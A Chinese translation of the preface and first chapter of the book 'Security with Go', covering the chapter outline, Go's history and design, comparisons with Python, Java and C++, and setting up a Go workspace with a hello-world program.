首页 > 其他分享 >Go-和安全(全)

Go-和安全(全)

时间:2024-05-04 22:58:36浏览次数:39  
标签:log err nil fmt 安全 Go os

Go 和安全(全)

原文:zh.annas-archive.org/md5/7656FC72AAECE258C02033B14E33EA12

译者:飞龙

协议:CC BY-NC-SA 4.0

前言

本书涵盖了 Go 编程语言,并解释了如何将其应用于网络安全行业。所涵盖的主题对于红队和蓝队都很有用,也适用于希望编写安全代码的开发人员,以及希望保护其网络、主机和知识产权的网络和运维工程师。源代码示例都是完全功能的程序。这些示例旨在成为您可能希望纳入自己工具包的实用应用程序。此外,本书还作为一个构建自定义应用程序的实用菜谱。我还分享了其他我学到的安全最佳实践和技巧。

本书将为您演示在各种计算机安全情况下有用的代码示例。在阅读本书的过程中,您将建立一个实用应用程序和构建模块的菜谱,用于您自己的安全工具,以用于您的组织和工作。它还将涵盖一些关于 Go 编程语言的技巧和趣闻,并提供许多有用的参考程序,以增强您自己的 Go 菜谱。

本书将涵盖几个蓝队和红队使用案例以及其他各种安全相关主题。蓝队主题,即隐写术、取证、数据包捕获、诱饵网站和密码学,以及红队主题,即暴力破解、端口扫描、绑定和反向 shell、SSH 客户端和网页抓取,都将被涵盖。每一章都涉及不同的安全主题,并演示与该主题相关的代码示例。如果您遵循本书,您将拥有一个充满有用安全工具和构建模块的菜谱,以创建您自己的 Go 自定义工具。

本书不是关于使用 Go 语言的深入教程。其中有一章专门解释 Go;然而,与 Alan Donovan 和 Brian Kernighan 的近 400 页的《Go 编程语言》相比,它只是皮毛。幸运的是,Go 是一种非常容易上手的语言,学习曲线很快。提供了一些关于学习 Go 的资源,但如果读者对 Go 不熟悉,可能需要进行一些补充阅读。

本书不会探索尚未有充分记录的尖端安全技术或漏洞。没有零日漏洞或重大技术揭示。每一章都专门讨论一个不同的安全主题。这些主题中的每一个都可以写一本书。有专门研究这些领域的专家,因此本书不会深入研究任何特定主题。读者在完成后将有一个坚实的基础,可以深入探索任何主题。

本书适合对象

本书适合已经熟悉 Go 编程语言的程序员。需要一些 Go 的知识,但读者不需要成为 Go 专家。内容面向 Go 的新手,但不会教会您使用 Go 的一切。对 Go 不熟悉的人将有机会探索和尝试 Go 的各个方面,并将其应用于安全实践。我们将从较小和较简单的示例开始,然后再转向使用更高级的 Go 语言特性的示例。

读者不必是高级安全专家,但至少应该对核心安全概念有基本的了解。目标是以经验丰富的开发人员或安全专家的身份,通过安全主题,改进他们的工具集,并建立一个 Go 参考代码库。喜欢构建充满有用工具的菜谱的读者将喜欢阅读这些章节。希望在与安全、网络和其他领域相关的 Go 中构建自定义工具的人将受益于这些示例。开发人员、渗透测试人员、SOC 分析员、DevOps 工程师、社会工程师和网络工程师都可以利用本书的内容。

本书涵盖内容

第一章,“使用 Go 进行安全介绍”,涵盖了 Go 的历史,并讨论了为什么 Go 是安全应用的一个不错选择,如何设置开发环境以及运行您的第一个程序。

第二章,“Go 编程语言”,介绍了使用 Go 进行编程的基础知识。它回顾了关键字和数据类型以及 Go 的显著特性。它还包含了获取帮助和阅读文档的信息。

第三章,“文件操作”,帮助您探索使用 Go 操作、读取、写入和压缩文件的各种方法。

第四章,“取证”,讨论了基本的文件取证、隐写术和网络取证技术。

第五章,“数据包捕获和注入”,涵盖了使用gopacket包进行数据包捕获的各个方面。主题包括获取网络设备列表、从实时网络设备捕获数据包、过滤数据包、解码数据包层以及发送自定义数据包。

第六章,“密码学”,解释了哈希、对称加密(如 AES)和非对称加密(如 RSA)、数字签名、验证签名、TLS 连接、生成密钥和证书以及其他密码学包。

第七章,“安全外壳(SSH)”,涵盖了 Go SSH 包,如何使用客户端进行密码和密钥对认证。它还涵盖了如何使用 SSH 在远程主机上执行命令和运行交互式外壳。

第八章,“暴力破解”,包括多个暴力破解攻击客户端的示例,包括 HTTP 基本身份验证、HTML 登录表单、SSH、MongoDB、MySQL 和 PostgreSQL。

第九章,“Web 应用程序”,解释了如何构建具有安全 cookie、经过消毒的输出、安全标头、日志记录和其他最佳实践的安全 Web 应用程序。它还涵盖了编写使用客户端证书、HTTP 代理和 Tor 等 SOCKS5 代理的安全 Web 客户端。

第十章,“Web 抓取”,讨论了基本的抓取技术,如字符串匹配、正则表达式和指纹识别。它还涵盖了goquery包,这是一个从结构化网页中提取数据的强大工具。

第十一章,“主机发现和枚举”,涵盖了端口扫描、横幅抓取、TCP 代理、简单的套接字服务器和客户端、模糊测试以及扫描具有命名主机的网络。

第十二章,“社会工程学”,提供了通过 JSON REST API(如 Reddit)收集情报的示例,使用 SMTP 发送钓鱼邮件以及生成 QR 码。它还涵盖了蜜罐以及 TCP 和 HTTP 蜜罐的示例。

第十三章,“后渗透”,涵盖了各种后渗透技术,如交叉编译绑定外壳、反向绑定外壳和 Web 外壳。它还提供了搜索可写文件并修改时间戳、所有权和权限的示例。

第十四章,“结论”,是对主题的总结,向您展示您可以从这里走向何方,并且还考虑了应用本书中学到的技术的注意事项。

为了充分利用本书

  1. 读者应具有基本的编程知识,并且至少了解一种编程语言。

  2. 要运行示例,读者需要安装了 Go 的计算机。安装说明在书中有介绍。推荐的操作系统是 Ubuntu Linux,但示例也应该可以在 macOS、Windows 和其他 Linux 发行版上运行。

下载示例代码文件

您可以从www.packtpub.com的帐户中下载本书的示例代码文件。如果您在其他地方购买了本书,您可以访问www.packtpub.com/support并注册,以便直接通过电子邮件接收文件。

您可以按照以下步骤下载代码文件:

  1. 登录或注册www.packtpub.com

  2. 选择“支持”选项卡。

  3. 点击“代码下载和勘误”。

  4. 在搜索框中输入书名,并按照屏幕上的指示操作。

下载文件后,请确保使用以下最新版本之一解压或提取文件夹:

  • WinRAR/7-Zip for Windows

  • Zipeg/iZip/UnRarX for Mac

  • 7-Zip/PeaZip for Linux

该书的代码包也托管在 GitHub 上,网址为github.com/PacktPublishing/Security-with-Go。我们还有其他书籍和视频的代码包可供下载,网址为github.com/PacktPublishing/。请查看!

使用的约定

本书中使用了许多文本约定。

CodeInText:表示文本中的代码字词、数据库表名、文件夹名、文件名、文件扩展名、路径名、虚拟 URL、用户输入和 Twitter 句柄。例如:" make()函数将创建一个具有特定长度和容量的特定类型的切片。"

代码块设置如下:

package main

import (
    "fmt"
)

func main() {
   // Basic for loop
   for i := 0; i < 3; i++ {
       fmt.Println("i:", i)
   }

   // For used as a while loop
   n := 5
   for n < 10 {
       fmt.Println(n)
       n++
   }
}

当我们希望引起您对代码块的特定部分的注意时,相关行或项目将以粗体显示:

package main

import (
    "fmt"
)

func main() {
   // Basic for loop
   for i := 0; i < 3; i++ {
       fmt.Println("i:", i)
   }

   // For used as a while loop
   n := 5
   for n < 10 {
       fmt.Println(n)
       n++
   }
}

任何命令行输入或输出都以以下方式编写:

sudo apt-get install golang-go 

粗体:表示新术语、重要单词或屏幕上看到的单词。例如,菜单或对话框中的单词会在文本中以这种方式出现。例如:"在 Windows 10 中,可以通过导航到控制面板|系统|高级系统设置|环境变量来找到。"

高级系统设置|环境变量。"

警告或重要说明看起来像这样。

提示和技巧看起来像这样。

第一章:使用 Go 进行安全介绍

安全和隐私作为实际问题,一直在不断引起兴趣,特别是在技术行业。网络安全市场正在蓬勃发展并持续增长。该行业随着创新和研究的不断涌现而发展迅速。安全的兴趣和速度不仅加快了,而且应用程序的规模和风险也成倍增长。该行业需要一种简单易学、跨平台、高效的编程语言。Go 是完美的选择,它拥有非常强大的标准库、学习曲线短、运行速度快。

在本章中,我们将涵盖以下主题:

  • Go 的历史、语言设计、批评、社区和学习技巧

  • 为什么使用 Go 进行安全

  • 设置开发环境并编写你的第一个程序

  • 运行示例程序

关于 Go

Go 是由谷歌创建并在 BSD 风格许可下分发的开源编程语言。BSD 许可允许任何人免费使用 Go,只要保留版权声明并且不使用谷歌名称进行认可或推广。Go 受到 C 的重大影响,但语法更简单,内存安全性和垃圾收集更好。有时,Go 被描述为现代的 C++。我认为这太过于简化,但 Go 绝对是一种简单而现代的语言。

Go 语言设计

Go 的最初目标是创建一种简单、可靠和高效的新语言。正如前面提到的,Go 受到 C 编程语言的重大影响。这种语言本身非常简单,只有 25 个关键字。它被设计成与集成开发环境很好地结合,但并不依赖于它们。根据我的经验,任何尝试过 Go 的人都会发现它非常用户友好,学习曲线很短。

Go 的主要目标之一是解决 C++和 Java 代码的一些负面问题,同时保持性能。这种语言需要简单而一致,以管理非常庞大的开发团队。

变量是静态类型的,应用程序可以快速编译成静态链接的二进制文件。拥有单个静态链接的二进制文件使得创建轻量级容器非常容易。最终的应用程序也运行得很快,接近 C++和 Java 的性能,比 Python 等解释性语言快得多。虽然有指针,但不允许指针算术。Go 并不是自诩为面向对象的编程语言,也没有传统意义上的;然而,它包含了许多与面向对象编程语言非常相似的机制。这将在下一章中更深入地讨论。接口被广泛使用,组合是继承的等价物。

Go 有许多有趣的特性。其中一个突出的特点是内置的并发性。只需在任何函数调用之前加上“go”这个词,它就会生成一个轻量级线程来执行该函数。另一个相当重要的特性是依赖管理,这是非常高效的。依赖管理是 Go 编译速度非常快的原因之一。它不会多次重新包含相同的头文件,就像 C++那样。Go 还具有内置的内存安全性,垃圾收集器处理未使用的内存清理。Go 的标准库也非常令人印象深刻。它是现代的,包含网络、HTTP、TLS、XML、JSON、数据库、图像处理和加密包。Go 还支持 Unicode,允许在源代码中使用各种字符。

Go 工具链是生态系统的核心。它提供了工具来下载和安装远程依赖项,运行单元测试和基准测试,生成代码,并根据 Go 格式标准格式化代码。它还包括编译器、链接器和汇编器,这些工具编译非常快,也允许通过简单地更改GOOSGOARCH环境变量来轻松进行交叉编译。

一些功能被排除在 Go 语言之外。泛型、继承、断言、异常、指针算术和隐式类型转换都被排除在 Go 之外。许多功能是有意省略的,特别是泛型、断言和指针算术。作者们故意省略了一些功能,因为他们希望保持性能,尽可能简化语言规范,或者他们无法就最佳实现方式达成一致,或者因为某个功能太有争议。继承也是有意被省略的,而是使用接口和组合。其他一些功能,比如泛型,也是因为关于它们的正确实现存在太多争论而被省略,但它们可能会出现在 Go 2.0 中。作者们认识到,向语言中添加功能要比删除功能容易得多。

Go 的历史

Go 是一种相对年轻的语言,起源于 2007 年,2009 年开源。它起源于 Google 的20%项目,由 Robert Griesemer、Rob Pike 和 Ken Thompson 共同开发。20%项目意味着项目的开发人员将 20%的时间用于作为实验性的副业项目。Go 1.0 于 2012 年 3 月正式发布。从一开始就计划将其作为一种开源语言。直到 Go 1.5 版本,编译器、链接器和汇编器都是用 C 语言编写的。在 1.5 版本之后,一切都是用 Go 语言编写的。

Google 最初为 Linux 和 macOS 推出了 Go,社区推动了其他平台的努力,即 Windows、FreeBSD、OpenBSD、NetBSD 和 Solaris。甚至已经移植到 IBM z 系统主机上。IBM 的 Bill O'Farrell 在 2016 年丹佛的 GopherCon 上做了一个名为将 Go 移植到 IBM z 架构的演讲(www.youtube.com/watch?v=z0f4Wgi94eo)。

谷歌以 Python、Java 和 C++而闻名。他们选择这些语言也是可以理解的。它们各自扮演着特定的角色,有各自的优势和劣势。Go 是为了创建一个符合谷歌需求的新语言。他们需要能够在重负载下表现出色,支持并发,并且易于阅读、编写和快速编译的软件。

启动 Go 项目的触发事件是处理一个庞大的 C++代码库,因为 C++处理依赖关系和重新包含头文件的方式,构建需要花费数小时的时间(www.youtube.com/watch?v=bj9T2c2Xk_s (37:15))。这就是为什么 Go 的主要目标之一是快速编译。Go 帮助将数小时的编译时间缩短到几秒,因为它比 C++更有效地处理依赖关系。

Go 2.0 的讨论已经开始,但仍处于概念阶段。目前没有发布时间表,也没有着急发布新的主要版本。

采用和社区

Go 仍然是一种年轻的语言,但它的采用率不断增长,也在人气上持续增长。Go 分别在 2009 年和 2016 年成为 TIOBE 年度语言:

来源:https://www.tiobe.com/tiobe-index/go/

Go 团队表达的期望之一是,他们预期 Go 会吸引大量的 C/C++和 Java 开发人员,但当大量用户来自 Python 和 Ruby 等脚本语言时,他们感到惊讶。其他人,比如我自己,发现 Go 是 Python 的一个自然补充,是一种很棒的语言。然而,当你需要更强大的东西时,你会选择哪种语言呢?一些大公司已经证明了 Go 在大规模生产中是稳定的,包括 Google、Dropbox、Netflix、Uber 和 SoundCloud。

第一个 Go 大会名为 GopherCon,于 2014 年举行。从那时起,GopherCon 每年都会举行。在gophercon.com上了解更多关于 GopherCon 的信息。我有幸在 2016 年的 GopherCon 上发表了关于数据包捕获的演讲,并有了很棒的经历(www.youtube.com/watch?v=APDnbmTKjgM)。

关于 Go 的常见批评

社区中经常出现一些批评。可能最臭名昭著且最受讨论的批评是缺乏泛型。这导致重复的代码来处理不同的数据类型。接口在一定程度上可以缓解这个问题。我们可能会在未来的版本中看到泛型,因为作者已经表现出对泛型的开放态度,但他们并没有匆忙做出重要的设计决定。

接下来经常听到的批评是缺乏异常处理。开发人员必须显式处理或忽略每个错误。就我个人而言,我发现这是一种令人耳目一新的改变。这并不是真的多做工作,而且你可以完全控制代码流程。有时候,使用异常处理时,你并不确定它会在哪里被捕获,因为它会一直冒泡上来。而使用 Go,你可以轻松地跟踪错误处理代码。

Go 有一个处理内存清理的垃圾收集器。垃圾收集器随着时间的推移得到了升级和改进。垃圾收集器确实会对性能产生一些影响,但它节省了开发人员大量的思考和担忧。最初,Go 被描述为一种系统编程语言,对内存的控制能力对于非常低级的应用程序来说是有限制的。自那时起,他们已经转变了对 Go 的称呼,不再称其为系统编程语言。如果你需要对内存进行低级别的控制,那么你将不得不用 C 语言编写部分代码。

Go 工具链

go可执行文件是 Go 工具链的主要应用程序。你可以向go传递一个命令,它将采取适当的操作。工具链有工具来运行、编译、格式化源代码,下载依赖项等。让我们看看完整的列表,这是通过go help命令或go本身获得的输出:

  • build: 这个命令编译包和依赖项

  • clean: 这个命令移除对象文件

  • doc: 这个命令显示包或符号的文档

  • env: 这个命令打印 Go 环境信息

  • generate: 这是代码生成器

  • fix: 这个命令在新版本发布时升级 Go 代码

  • fmt: 这个命令在包源代码上运行gofmt

  • get: 这个命令下载并安装包和依赖项

  • help: 这个命令提供特定主题的更多帮助

  • install: 这个命令编译并安装包和依赖项

  • list: 这个命令列出包

  • run: 这个命令编译并运行 Go 程序

  • test: 这个命令运行单元测试和基准测试

  • vet: 这个命令用于检查源代码中的错误

  • version: 这个命令显示 Go 版本

有关这些命令的更多信息,请访问golang.org/cmd/

Go 吉祥物

每个人都知道最好的剑有名字,最好的编程语言有吉祥物。Go 的吉祥物是gopher。这只 gopher 没有名字。它有一个豆子形状的身体,微小的四肢,巨大的眼睛和两颗牙齿。它是由 Renee French 设计的,其版权属于知识共享署名 3.0许可。这意味着你可以使用这些图片,但必须在使用的地方给予其创作者 Renee French 的信用。

Renee French 在 2016 年的丹佛 GopherCon 上做了一个名为The Go Gopher: A Character Study的演讲,解释了 gopher 的由来,它所采取的各种媒介和形式,以及在各种情况下画它的技巧(www.youtube.com/watch?v=4rw_B4yY69k)。

你可以在gopherize.me/生成一个定制的 gopher 头像,并在blog.golang.org/gopher上了解更多关于 Go gopher 的信息。

学习 Go

如果你以前没有使用过 Go,不要害怕。它有一个温和的学习曲线,只需一两天就可以学会。开始的最佳地点是tour.golang.org/。这是 Go 编程语言的基本教程。如果你已经完成了这个教程,那么你应该已经有了足够的基础来顺利阅读本书。如果你正在阅读本书,但还没有参加过这个教程,你可能会遇到一些你不熟悉的概念,这里没有解释。这个教程是一个学习和练习的好地方。

由于语言规范中只有 25 个保留关键字,它足够简短,可以被“凡人”理解。你可以在golang.org/ref/spec上阅读更多关于规范的信息。

你必须已经熟悉了大部分这些关键词。它们包括:ifelsegotoforimportreturnvarcontinuebreakrangetypefuncinterfacepackageconstmapstructselectcaseswitchgodeferchanfallthroughdefault

这个教程将帮助你学习关键词、语法和数据结构的基础知识。教程中的游乐场让你可以在浏览器中练习编写和运行代码。

为什么使用 Go?

关于 Go,有几个方面吸引了我。并发性,速度和简单性对我来说是最重要的。这种语言非常简单,易于学习。它没有trycatch和异常流程。尽管有些人批评繁琐的错误处理,但我发现拥有一种简单的语言是令人耳目一新的,它不会在幕后隐藏很多魔法,而是确切地做它所说的。go fmt工具标准化了格式,使得阅读他人的代码变得容易,并消除了定义自己的标准的负担。

Go 提供了一种可扩展性和可靠性的感觉,实际上是一种令人愉快的体验。在 Go 之前,快速编译代码的主要选择是 C++,对于不同的平台管理头文件和构建过程并不是一件简单的任务。多年来,C++已经变得非常复杂,对大多数人来说并不像 Go 那样易于接近。

为什么在安全领域使用 Go?

我认为我们都明白没有最好的编程语言这回事,但不同的工作有不同的工具。Go 在性能和并发性方面表现出色。它的其他一些优点包括能够编译成单个可执行文件并且容易进行跨平台编译。它还有一个现代化的标准库,非常适合网络应用。

跨编译的便利性在安全领域产生了一些有趣的用例。以下是安全领域中跨编译的一些用例:

  • 渗透测试人员可以使用树莓派为 Windows、macOS 和 Linux 编译自定义的 Go 反向外壳,并尝试部署它们。

  • 网络防御者可以有一个中央数据库,用来存储所有蜜罐服务器提供的蜜罐信息,然后交叉编译蜜罐服务器。这将使他们能够轻松地在所有平台上部署一致的应用程序,包括 Windows、mac 和 Linux。

  • 网络防御者可以在网络中部署非常轻量级的蜜罐,形式为一个 Docker 容器,其中包含一个单一的静态链接二进制文件。容器可以快速创建和销毁,使用最小的带宽和服务器资源。

当你在思考 Go 是否是一个好的语言选择时,将 Go 与其他顶级语言进行比较可能会有所帮助。

为什么不使用 Python?

Python 是安全领域中流行的语言。这很可能是因为它的普及性、学习曲线短和大量的库。已经有一些有用的安全工具用 Python 编写,比如用于数据包捕获的 Scapy,用于网页抓取的 Scrapy,用于调试的 Immunity,用于解析 HTML 的 Beautiful Soup,以及用于内存取证的 Volatility。许多供应商和服务提供商也提供了 Python 的 API 示例。

Python 易于学习,并且有大量资源。Go 也易于编写,并且学习曲线平缓。在我看来,学习曲线和编程的简易性并不是 Go 和 Python 之间的主要区别因素。最大的区别,以及 Python 的不足之处,是性能。Python 在性能方面无法与 Go 竞争。部分原因是 Python 的解释性质,但更大的因素是全局解释器锁GIL)。GIL 阻止解释器使用超过一个 CPU 的处理能力,即使有多个线程在执行。有一些方法可以绕过这个问题,比如使用多进程,但这也有自己的缺点和限制,因为它实际上是在派生一个新的进程。其他选项是使用 Jython(Python 在 Java 上)或 IronPython(Python 在.NET 上),这些都没有 GIL。

为什么不使用 Java?

Java 最大的优势之一是一次编写,到处运行WORA)的能力。如果涉及到 GUI、图形或音频等任何事情,这是非常有价值的。Go 在创建 GUI 方面肯定不如 Java,但它是跨平台的,并支持交叉编译。

Java 是成熟且被广泛采用的,有大量可用的资源。与 Go 包相比,Java 库的选择更多。Java 是这两种语言中更冗长的一种。Java 生态系统更加复杂,有几种构建工具和包管理器可供选择。Go 更简单,更标准化。这些差异可能仅仅是由于这两种语言之间的年龄差异,但它可能仍会影响你的语言选择。

在某些情况下,Java 虚拟机JVM)在内存或启动时间方面可能过于资源密集。如果需要将几个命令行 Java 应用程序串联在一起,为了运行一系列短暂的程序而启动 JVM 可能会对性能造成显著影响。在内存方面,如果需要运行同一应用程序的多个实例,那么运行每个 JVM 所需的内存可能会累积起来。JVM 也可能会限制,因为它创建了一个沙盒并限制了对主机机器的访问。Go 编译成本机代码,因此不需要虚拟机层。

Go 有很好的文档,并且社区不断增长并提供更多资源。对于有经验的程序员来说,这是一门容易学习的语言。并发性相对简单,并内置于语言中,而不是作为一个库包。

为什么不使用 C++?

C++确实提供了更多的控制,因为开发人员负责内存管理,没有垃圾收集器。出于同样的原因,C++的性能会稍微更好。在某些情况下,Go 实际上可以胜过 C++。

C++非常成熟,并拥有大量的第三方库。库并非总是跨平台的,可能具有复杂的 makefile。在 Go 中,交叉编译要简单得多,并且可以使用 Go 工具链完成。

Go 的编译效率更高,因为它具有更好的依赖管理。C++可以多次重新包含相同的头文件,导致编译时间膨胀。Go 中的包系统更一致和标准化。线程和并发在 Go 中是本地的,而在 C++中需要特定于平台的库。

C++的成熟也导致了语言随着时间的推移变得更加复杂。Go 是一种简单而现代的语言,带来了一种清新的变化。对初学者来说,C++不像 Go 那样友好。

开发环境

本书中的所有示例都可以在主要平台 Windows、macOS 和 Linux 上运行。话虽如此,这些示例主要是在 Ubuntu Linux 上编写和开发的,这是以下示例的推荐平台。

Ubuntu Linux 可以在www.ubuntu.com/download/desktop免费下载。下载页面可能会要求捐赠,但您可以选择免费下载。虽然不是必须使用 Ubuntu,但如果您使用相同的环境,阅读本书会更容易。其他 Linux 发行版同样适用,但我强烈建议您使用基于 Debian 的发行版。本书中的大多数 Go 代码示例都可以在 Windows、Linux 和 Mac 上运行,无需任何修改。某些示例可能是特定于 Linux 和 Mac 的,例如文件权限,在 Windows 中处理方式不同。任何特定于平台的示例都会有所提及。

您可以在虚拟机内免费安装 Ubuntu,也可以将其作为主要操作系统。只要您的系统具有足够的 CPU、RAM 和磁盘空间,我建议您使用 Oracle VirtualBox 提供的虚拟机,该虚拟机可在www.virtualbox.org/上获得。VMWare Player 是 VirtualBox 的替代品,可在www.vmware.com/products/player/playerpro-evaluation.html上获得。

下载并安装 VirtualBox,然后下载 Ubuntu 桌面 ISO 文件。创建一个虚拟机,让它引导 Ubuntu ISO,并选择安装选项。安装完 Ubuntu 并以您的用户身份登录后,您可以安装 Go 编程语言。Ubuntu 通过提供一个软件包使这变得非常容易。只需打开一个终端窗口,运行以下命令:

sudo apt-get install golang-go

使用sudo提升您的权限以进行安装,并可能要求您输入密码。如果一切顺利,您现在将可以访问包含整个工具链的go可执行文件。您可以运行go help或仅运行go以获取使用说明。

如果您没有使用 Ubuntu 或想要安装最新版本,您可以从golang.org/dl下载最新版本。Windows 和 Mac 安装程序将负责更新您的PATH环境变量,但在 Linux 中,您将不得不将提取的内容移动到所需的位置,例如/opt/go,然后手动更新您的PATH环境变量以包括该位置。考虑以下示例:

# Extract the downloaded Go tar.gz
tar xzf go1.9.linux-amd64.tar.gz
# Move the extracted directory to /opt
sudo mv go /opt
# Update PATH environment variable to include Go's binaries
echo "export PATH=$PATH:/opt/go/bin" >> ~/.bashrc

现在重新启动终端以使更改生效。如果您使用的是 Bash 之外的 shell,您需要更新适合您的 shell 的正确 RC 文件。

在其他平台上安装 Go

如果您没有使用 Ubuntu,您仍然可以轻松安装 Go。Go 网站在golang.org/dl/的下载页面提供了多种安装格式。

其他 Linux 发行版

第一个选项是使用 Linux 发行版的软件包管理器安装 Go。大多数主要发行版都有 Go 的软件包。名称各不相同,因此可能需要进行网络搜索以获取确切的软件包名称。如果没有可用的软件包,您可以简单地下载预编译的 Linux tarball 并解压缩。将内容解压到/opt/go是一个不错的选择。然后,以与上一节中描述的方式相同,将/opt/go/bin添加到您的PATH环境变量中。

Windows

官方的 Windows 安装程序可用,安装过程就像运行安装程序一样简单。您可能需要修改环境变量并更新您的%PATH%变量。在 Windows 10 中,可以通过导航到控制面板 | 系统 | 高级系统设置 | 环境变量找到。

Mac

Mac 也有官方的安装程序可用。运行安装程序后,Go 将在您的PATH变量中可用。

设置 Go

此时,您的环境应该已经安装了 Go,并且您应该能够从终端窗口运行go可执行文件。go 程序是您访问 Go 工具链的方式。您可以通过运行以下命令来测试它:

go help

现在我们准备编写第一个 Hello World 程序,以确保我们的环境完全正常。不过,在开始编码之前,我们需要创建一个适当的工作区。

创建您的工作区

Go 有一个工作区的标准文件夹结构。遵守特定的标准对于 Go 工具链正常工作非常重要。您可以在任何地方创建工作区目录,并且可以随意命名。在实验环境中,我们将简单地使用Home目录作为 Go 工作区。这意味着源文件将驻留在~/src,包将构建在~/pkg,可执行文件将安装到~/bin

设置环境变量

为了让大部分 Go 工具链正常工作,必须设置GOPATH环境变量。GOPATH指定了你将其视为工作区的目录。在构建包之前,必须设置GOPATH环境变量。要获取更多帮助和信息,请在终端中运行以下命令调用go help命令:

go help gopath

我们需要告诉 Go 将我们的home目录视为工作区。这是通过设置GOPATH环境变量来完成的。您可以通过以下三种方式设置GOPATH

  • 第一种方法是每次运行go命令时手动设置它。考虑以下示例:
 GOPATH=$HOME go build hello
  • 您还可以设置GOPATH变量,以便在关闭终端时保持设置,环境变量丢失:
 export GOPATH=$HOME
  • 第三个选项是永久设置GOPATH环境变量如下:
    1. 将其添加到您的 shell 启动脚本.bashrc中。这将在每次启动终端时设置变量。
  1. 运行此命令以确保在打开未来的终端/ shell 会话时设置GOPATH

 echo "export GOPATH=$HOME" >> $HOME/.bashrc
    1. 重新启动终端以使更改生效。如果您使用 Zsh 或其他替代 shell,则需要更新相应的 RC 文件。

请注意,Go 版本 1.8 及更高版本不需要显式设置GOPATH环境变量。如果未设置GOPATH,它将使用$HOME/go作为默认工作区。

编辑器

我们将在我们的新hello目录中编写我们的第一个程序。您首先需要选择要使用的编辑器。幸运的是,使用 Go 不需要任何特殊的 IDE 或编辑器。Go 工具链可以轻松集成到许多编辑器和 IDE 中。您可以选择使用简单的文本编辑器,如记事本,也可以选择专门用于 Go 的完整的 IDE。

我建议您从一个简单的文本编辑器开始,比如 nano 或 gedit,因为这些都包含在 Ubuntu 中,易于使用,并且支持 Go 的语法高亮。当然,您也可以选择其他编辑器或 IDE。

许多文本编辑器和 IDE 都有 Go 支持的插件。例如,Visual Studio Code、Emacs、Sublime Text、JetBrains IntelliJ、Vim、Atom、NetBeans 和 Eclipse 都有 Go 插件。还有一些专门针对 Go 的 IDE,即 JetBrains GoLand 和 LiteIDE,两者都是跨平台的。

在您熟悉 Go 之后,可以从nanogedit命令开始,然后探索其他编辑器和 IDE。本书不会比较编辑器或介绍如何配置它们。

创建您的第一个包

~/src目录中,您创建的任何目录都是一个包。您的目录名称成为包或应用程序的名称。我们首先需要确保src目录存在。波浪号(~)类似于$HOME变量,是您的主目录的快捷方式。请参考以下代码块:

mkdir ~/src

让我们为我们的第一个应用程序创建一个名为hello的新包:

cd ~/src
mkdir hello

包只是一个目录。您可以在包中有一个或多个源文件。任何子目录都被视为单独的包。包可以是一个带有main()函数(package main)的应用程序,也可以是一个只能被其他包导入的库。这个包还没有任何文件,但我们马上就会写第一个文件。现在不要太担心包的结构。您可以在golang.org/doc/code.html#PackagePaths上阅读有关包路径的更多信息。

编写你的第一个程序

您可以在一个目录中拥有的最简单的包是一个目录中的单个文件。创建一个新文件~/src/hello/hello.go,并将以下代码放入其中:

package main

import "fmt"

func main() {
   fmt.Println("Hello, world.")
}

运行可执行文件

执行程序的最简单方法是使用go run命令。以下命令将在不留下可执行文件的情况下运行该文件:

go run ~/src/hello/hello.go

构建可执行文件

要编译和构建可执行文件,请使用go build命令。运行go build时,必须传递一个包的路径。您提供的包路径是相对于$GOPATH/src的。由于我们的包在~/src/hello中,我们将运行以下命令:

go build hello

只要我们设置了$GOPATH,就可以从任何地方调用go build。创建的可执行二进制文件将输出到当前工作目录中。然后可以使用以下命令运行它:

./hello

安装可执行文件

go build工具适用于在当前工作目录中生成可执行文件,但有一种方法可以构建和安装您的应用程序,以便将可执行文件收集在同一位置。

当您运行go install时,它会将输出文件放在$GOPATH/bin的默认位置。在我们的情况下,我们将$GOPATH设置为我们的$HOME。因此,默认的bin目录将是$HOME/bin

如果要将其安装到其他位置,可以通过设置GOBIN环境变量来覆盖位置。要安装我们的hello程序,我们将运行以下命令:

go install hello

这将构建并创建一个可执行文件,~/bin/hello。如果bin目录尚不存在,它将自动创建。如果多次运行install命令,它将重新构建并覆盖bin目录中的可执行文件。然后可以使用以下命令运行应用程序:

~/bin/hello

为了方便起见,您可以将~/bin添加到您的PATH环境变量中。这样做将允许您从任何工作目录运行应用程序。要将bin目录添加到您的PATH中,请在终端中运行以下命令:

echo "export PATH=$PATH:$HOME/gospace/bin" >> ~/.bashrc

确保在此之后重新启动您的终端以刷新环境变量。之后,您可以通过在终端中简单地输入以下内容来运行hello应用程序:

hello

安装应用程序是完全可选的。您不必安装程序来运行或构建它们。在开发时,您可以始终从当前工作目录构建和运行,但安装经常使用的已完成应用程序可能会更方便。

使用 go fmt 进行格式化

go fmt命令用于格式化源代码文件以符合 Go 格式标准。

这将确保缩进准确,没有过多的空格等。您可以一次格式化单个 Go 源代码文件或整个包。遵循 Go 编码标准并在文件上运行go fmt是一个好习惯,这样您就不会怀疑您的代码是否遵循了指南。在golang.org/doc/effective_go.html#formatting上阅读更多关于格式化的内容。

运行 Go 示例

本书提供的示例都是独立的。每个示例都是一个完整的程序,可以运行。大多数示例都很简短,演示了一个特定的主题。虽然这些示例可以作为独立的程序使用,但其中一些可能有限的用途。它们旨在作为参考,并像烹饪书一样用于构建自己的项目。因为每个示例都是一个独立的主包,您可以使用go build命令获得可执行文件,并使用go run运行文件。以下是有关构建和运行程序的各种选项的更多详细信息。

构建单个 Go 文件

如果构建一个文件,它将生成一个以 Go 文件命名的可执行文件。运行以下命令:

go build example.go

这将为您生成一个名为 example 的可执行文件,可以像这样执行:

./example

运行单个 Go 文件

如果您只想运行文件而不生成可执行文件,您不必构建文件。go run选项允许您运行.go文件,而不会留下可执行文件。您仍然可以传递参数,就像它是一个常规可执行文件一样,如下所示:

go run example.go arg1 arg2

构建多个 Go 文件

如果一个程序分成多个文件,您可以将它们全部传递给build命令。例如,如果您有一个main.go文件和一个包含额外函数的utility.go文件,您可以通过运行以下命令构建它们:

go build main.go utility.go

如果您尝试单独构建main.go,它将无法找到utility.go中函数的引用。

构建文件夹(包)

如果一个包包含多个需要构建的 Go 文件,逐个传递每个文件给build命令是很麻烦的。如果在文件夹中不带参数运行go build,它将尝试构建目录中的所有.go文件。如果其中一个文件在顶部包含package main语句,它将生成一个以目录名称命名的可执行文件。如果您编写一个程序,可以编写一个不包含主文件,仅用作库以包含在其他项目中的包。

安装程序以供使用

